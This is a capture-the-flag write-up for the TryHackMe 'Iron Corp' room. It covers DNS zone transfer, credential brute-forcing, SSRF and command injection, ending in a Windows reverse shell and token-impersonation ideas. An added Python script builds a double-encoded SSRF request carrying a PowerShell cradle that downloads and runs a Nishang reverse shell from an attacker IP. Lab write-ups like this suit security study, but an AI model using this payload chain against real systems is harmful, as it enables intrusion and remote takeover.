Iron Corp
https://tryhackme.com/room/ironcorp
The asset in scope is: ironcorp.me
Note: add ironcorp.me to your hosts file (/etc/hosts) before starting.
User flag
Let's start with port enumeration.

We see there are a few open ports. We'll check the HTTP ones first (80 and 11025).

After a while of looking around and enumerating directories on port 80 we found nothing interesting, so let's move on to the next port.

Same thing on 11025: nothing interesting comes out. Time to check the other ports.
We saw that port 53 (DNS) was open, so maybe we can pull some subdomains out of it using dig:

Pretty interesting. Let's add them to the hosts file and check what's inside.
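As an added example (not part of the original write-up), here is a small script that turns the dig output into hosts-file entries so the new names don't have to be copied by hand. It assumes the subdomains came from a zone transfer (`dig axfr ironcorp.me @<target-ip>`) and that the target IP is 10.10.10.10; the page doesn't state either. The dig output embedded below is constructed, and its record names are placeholders, not the room's real subdomains.

```python
"""Parse `dig axfr` output into in-zone hostnames and build a hosts-file line.

Added example, not code from the write-up. Assumptions: zone transfer is how
the subdomains were obtained, and the target IP is 10.10.10.10 (placeholder).
"""
import re
import shutil
import subprocess
from typing import List

ZONE = "ironcorp.me"
TARGET_IP = "10.10.10.10"   # assumed; replace with the box's IP

# Constructed sample of what `dig axfr ironcorp.me @10.10.10.10` might print.
# The sub1/sub2 names are placeholders, not the real subdomains of the room.
SAMPLE_AXFR = """\
; <<>> DiG 9.16.1-Ubuntu <<>> axfr ironcorp.me @10.10.10.10
;; global options: +cmd
ironcorp.me.            3600    IN      SOA     ns.ironcorp.me. hostmaster.ironcorp.me. 1 900 600 86400 3600
ironcorp.me.            3600    IN      NS      ns.ironcorp.me.
ironcorp.me.            3600    IN      A       10.10.10.10
ns.ironcorp.me.         3600    IN      A       10.10.10.10
sub1.ironcorp.me.       3600    IN      A       10.10.10.10
sub2.ironcorp.me.       3600    IN      CNAME   sub1.ironcorp.me.
ironcorp.me.            3600    IN      SOA     ns.ironcorp.me. hostmaster.ironcorp.me. 1 900 600 86400 3600
;; Query time: 3 msec
"""

# One resource record line: owner. ttl IN type rdata  (comment lines start with ';')
_RR = re.compile(r"^(?P<name>[A-Za-z0-9._-]+)\.\s+\d+\s+IN\s+(?P<type>[A-Z]+)\s+(?P<rdata>.*)$")


def run_axfr(zone: str = ZONE, server: str = TARGET_IP) -> str:
    """Run a zone transfer against the target's DNS server and return dig's raw output."""
    proc = subprocess.run(["dig", "axfr", zone, f"@{server}"],
                          capture_output=True, text=True, check=False)
    return proc.stdout


def extract_hosts(axfr_output: str, zone: str = ZONE) -> List[str]:
    """Return unique in-zone hostnames from A and CNAME records (owners and CNAME targets),
    in the order they first appear. SOA/NS/other records are ignored."""
    hosts: List[str] = []

    def add(name: str) -> None:
        name = name.rstrip(".")
        if (name == zone or name.endswith("." + zone)) and name not in hosts:
            hosts.append(name)

    for line in axfr_output.splitlines():
        m = _RR.match(line)
        if not m:
            continue
        if m["type"] == "A":
            add(m["name"])
        elif m["type"] == "CNAME":
            add(m["name"])
            add(m["rdata"].strip())
    return hosts


def hosts_file_line(hosts: List[str], ip: str = TARGET_IP) -> str:
    """Format all discovered names as a single /etc/hosts line pointing at the box."""
    return f"{ip} {' '.join(hosts)}"


if __name__ == "__main__":
    # Use the real transfer when dig is available, otherwise the constructed sample.
    output = run_axfr() if shutil.which("dig") else SAMPLE_AXFR
    found = extract_hosts(output)
    if not found:
        print("no in-zone A/CNAME records found (transfer refused?)")
    else:
        print(hosts_file_line(found))   # append this to /etc/hosts
```

If the transfer is refused, `extract_hosts` returns an empty list rather than a bogus line; in that case the names have to come from elsewhere (the page's own dig query, or a subdomain brute-force against port 53).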


We don't have access to the internal page, and the admin one asks for credentials. Let's try to brute-force them using hydra:

We got in. Let's take a look.


One of the room's tags mentions "SSRF", so let's stand up a web server on our machine and pass its URL as the parameter (r=http://ip/test.txt) to see whether the admin page fetches it for us.


Now we can point the same parameter at the internal subdomain and see whether the SSRF lets us bypass the forbidden access.


Let's try that URL.


We can try command injection. After a few tries we see that "|" lets us break out of the intended command and chain our own.

So now we can try to upload a reverse shell to the victim machine and execute it. We'll use the well-known "Invoke-PowerShellTcp.ps1" PowerShell script from Nishang.


I don't know why, but we had to URL-encode the command twice for it to work.

Once the script is uploaded, let's execute it (we could also have used a one-liner that downloads and executes it in one go).

(Same as before: the command has to be double-encoded.)
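As an added example (not part of the original write-up), the script below builds the chain used in the SSRF and command-injection steps above: the probe URL (r=http://ip/test.txt), then a request that makes the admin page fetch the internal subdomain with a "|"-injected command, double URL-encoded, and finally a replay of what each hop sees after decoding. Everything named here is assumed, none of it is confirmed by the page: the admin endpoint is http://admin.ironcorp.me/ with parameter `r`, the internal page is http://internal.ironcorp.me/ and reads its input from a parameter named `q`, and the attacker box is 10.9.0.1 serving Invoke-PowerShellTcp.ps1 over HTTP on port 8000 while listening on port 4444. The injected command is the download-and-execute one-liner variant rather than the two-step upload the write-up used. A plausible reason for the double encoding, which the page doesn't verify: the admin app decodes `r` once before fetching it, and the internal app decodes its own query string once more, so "|" and the spaces in the command must survive two query-string parses.

```python
"""Build the SSRF + command-injection payload with double URL encoding.

Added example, not code from the write-up. Hostnames, parameter names, the
attacker IP and ports are placeholders (assumptions, see comments).
"""
from urllib.parse import parse_qs, quote, urlencode, urlparse

ADMIN_URL = "http://admin.ironcorp.me/"         # assumed admin endpoint
INTERNAL_URL = "http://internal.ironcorp.me/"   # assumed internal endpoint
ATTACKER_IP = "10.9.0.1"                        # assumed attacker address
WEB_PORT, SHELL_PORT = 8000, 4444               # assumed: script server / listener


def ssrf_probe_url(ip: str = ATTACKER_IP, web_port: int = WEB_PORT) -> str:
    """First test from the write-up: make the admin page fetch a file from our server.
    A hit in our web server's log proves the SSRF."""
    return f"{ADMIN_URL}?{urlencode({'r': f'http://{ip}:{web_port}/test.txt'})}"


def download_cradle(ip: str = ATTACKER_IP, web_port: int = WEB_PORT,
                    shell_port: int = SHELL_PORT) -> str:
    """PowerShell one-liner: fetch Invoke-PowerShellTcp.ps1 from our server and run it
    (the "one liner to download and execute" alternative the write-up mentions)."""
    script = f"http://{ip}:{web_port}/Invoke-PowerShellTcp.ps1"
    return (f"powershell -c \"IEX(New-Object Net.WebClient).DownloadString('{script}');"
            f"Invoke-PowerShellTcp -Reverse -IPAddress {ip} -Port {shell_port}\"")


def inner_url(cmd: str, benign: str = "test", param: str = "q") -> str:
    """URL the admin page fetches on our behalf: benign input, then '|' and our command.
    Encoded once (safe='' so '|' becomes %7C), which the internal app's query parser
    turns back into the raw command."""
    return f"{INTERNAL_URL}?{param}={quote(benign + '|' + cmd, safe='')}"


def ssrf_request(cmd: str) -> str:
    """Full request to the admin page. urlencode quotes the whole `r` value once more,
    so the injected command ends up URL-encoded twice ('|' appears as %257C)."""
    return f"{ADMIN_URL}?{urlencode({'r': inner_url(cmd)})}"


def simulate_chain(url: str) -> dict:
    """Replay the two decodes: the admin app parses its query string (one decode) and
    fetches `r`; the internal app parses that URL's query string (second decode)."""
    admin_fetches = parse_qs(urlparse(url).query)["r"][0]
    internal_runs = parse_qs(urlparse(admin_fetches).query)["q"][0]
    return {"admin_fetches": admin_fetches, "internal_runs": internal_runs}


if __name__ == "__main__":
    print("probe:", ssrf_probe_url())
    req = ssrf_request(download_cradle())
    print("request:", req)
    for hop, value in simulate_chain(req).items():
        print(f"{hop}: {value}")
```

Send the `request:` line with curl or the browser while the HTTP server and the listener are up; `simulate_chain` only shows the decoded form each hop should see, it does not talk to the box.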


Nice, we're in. Let's check our privileges.

We are nt authority\system. This can't get any better. Let's grab the flag.

Root Flag

Looking around, we see we don't have access to the SuperAdmin folder. On TryHackMe the root flag is usually on the user's Desktop, so what happens if we try to read it directly?

We got it, but this probably wasn't the intended path. So what else can we do? Let's check the folder permissions.

Now let's check our token privileges.

We could upgrade to a Meterpreter shell, load the incognito extension and impersonate the right token to get access to that folder.